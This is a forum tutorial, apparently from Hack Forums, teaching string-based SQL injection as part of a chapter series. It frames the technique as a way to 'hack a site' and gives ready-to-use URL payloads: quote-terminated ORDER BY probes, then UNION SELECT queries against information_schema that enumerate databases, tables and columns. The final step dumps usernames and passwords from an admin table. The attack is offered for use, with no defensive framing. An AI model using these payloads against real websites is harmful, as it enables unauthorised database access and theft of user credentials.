Tutorial by Zer0Freak
Difficulty: Easy
Requirements: 10 minutes of reading time, patience and intuition
Previous Chapters:
Chapter1:
http://www.hackforums.net/showthread.php?tid=2059771
Chapter2:
http://www.hackforums.net/showthread.php?tid=2060211
Chapter3:
http://www.hackforums.net/showthread.php?tid=2061628
Chapter4:
http://www.hackforums.net/showthread.php?tid=2085773
Alright, since my previous tutorials haven't had enough responses as I
expected due to people who aren't fond of reading big tutorials, I've
decided I won't make this tutorial big. As a matter of fact, I'll just
make you understand the concepts behind String Based SQL injection. I
KNOW there are a lot of tutorials that would be the same as this one,
but I guarantee that if you read this, you won't have any doubts on
String Based.
What is String Based SQL injection and how to notice them?
To make this simple to understand, String Based SQL injection happens
when the site is vulnerable to SQL injection but doesn't show us the
results needed to be displayed after executing our SQLi query.
Common known issues that proves the site being vulnerable to String Based are:
Code:
"order by" doesn't work, example: order by 100--
"group by" doesn't work
"having 1=2" doesn't work
queries related to SQL injection doesn't work (will show a normal page even though site is vuln to SQLi)
Solution to this issue in order to hack a site with String Based SQL injection
The answer to this problem is by using the following format while trying to hack a site with SQLi
Code:
http://site.com/index.php?id=10' order by 1000--+
That will show us the error, hence displaying the results according to our query.
The point here is that we used the quote
' and the
+ sign in our query
Alright that you've got the point lets try String Based on some of the other types of SQL injection shall we
String-Union Based SQL injection
1. Obtaining the number of columns (in this example, we'll use 10 columns)
Code:
http://www.site.com/index.php?id=234' order by 11--+
Results show error, so we'll assume as 10 columns, since it'll be an example for our process
2. Obtaining the Databases
Code:
http://www.site.com/index.php?id=-234'
UNION SELECT 1,2,3,4,5,group_concat(schema_name,0x0a),7,8,9,10 from
information_schema.schemata--+
Results will display the databases on their website
Note: If
you don't know anything about UNION Based SQL injection, I suggest you
read one of my tutorials to progress further in this step
3.Obtaining the Tables from the current Database
Code:
http://www.site.com/index.php?id=-234'
UNION SELECT 1,2,3,4,5,group_concat(table_schema,0x0a),7,8,9,10 from
information_schema.tables where table_schema=database()--+
Results will display the current table names
For this example, we'll be using the table name: "
admin"
4.Obtaining Column names from a specific table (which in this example is "admin")
Code:
http://www.site.com/index.php?id=-234'
UNION SELECT 1,2,3,4,5,group_concat(column_name,0x0a),7,8,9,10 from
information_schema.columns where table_name=0x61646d696e--+
Results will display the column names from the current table
To convert plain text to hex, use:
http://www.swingnote.com/tools/texttohex.php
For this example, we'll use "
username" and "
password" as our column names
5.Obtaining Data from Column names
Code:
http://www.site.com/index.php?id=-234' UNION SELECT 1,2,3,4,5,group_concat(username,0x3a,password,0x0a),7,8,9,10 from admin--+
Results will display the data given by the columns you have chosen
This can be also done with Error Based SQL injection, Blind Based and other types of SQL injection
Please refer to my previous tutorials to know more about Error Based and Union Based
This will be considered as a
mini tutorial for String Based SQL injection. I just hope people are
gonna understand this as much as they're on their journey through SQL
injection
Hope you guys enjoy this. It's pretty much the concept that is needed when you SQLi
End of Chapter 5
Upcoming Chapter: Blind Based SQL Injection Detailed
Contact me via PM
or
Email: zerofreak@live.com
Have a great day